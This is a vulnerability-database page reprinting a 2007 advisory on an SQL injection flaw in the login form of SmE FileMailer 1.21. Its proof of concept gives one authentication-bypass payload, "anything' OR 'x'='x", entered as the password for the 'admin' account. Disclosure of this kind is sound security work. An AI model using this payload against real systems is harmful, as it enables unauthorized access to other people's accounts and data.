Lucene search

smefilemailer-sql.txt

🗓️ 20 Jan 2007 00:00:00Reported by CorryLType

packetstorm🔗 packetstormsecurity.com👁 20 Views

SmE FileMailer 1.21 has sql injection vulnerability allowing remote exploitation.

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`-=[--------------------ADVISORY-------------------]=-  
  
SmE FileMailer 1.21  
  
Author: CorryL [[email protected]]   
-=[-----------------------------------------------]=-  
  
  
-=[+] Application: SmE FileMailer   
-=[+] Version: 1.21  
-=[+] Vendor's URL: http://www.scriptme.com/down/13   
-=[+] Platform: Windows\Linux\Unix  
-=[+] Bug type: sql injection  
-=[+] Exploitation: Remote  
-=[-]  
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~  
-=[+] Reference: www.x0n3-h4ck.org  
-=[+] Virtual Office: http://www.kasamba.com/CorryL  
-=[+] Irc Chan: irc.darksin.net #x0n3-h4ck   
  
  
..::[ Descriprion ]::..  
  
SMe FileMailer lets you require visitors to submit their name and email address in order to retrieve a file from your site. Upon submitting the information, the link for file is sent to the visitor via email. This is a great way to stop leeching and third-party linking of your files, and it also lets you know exactly who's obtaining your files!   
  
  
  
..::[ Proof Of Concept ]::..  
  
In the login form insert  
  
Login: admin  
  
Password: anything' OR 'x'='x   
  
  
..::[ Disclousure Timeline ]::..  
  
[16/01/2007] - Public disclousure  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

20 Jan 2007 00:00Current

7.4High risk

Vulners AI Score7.4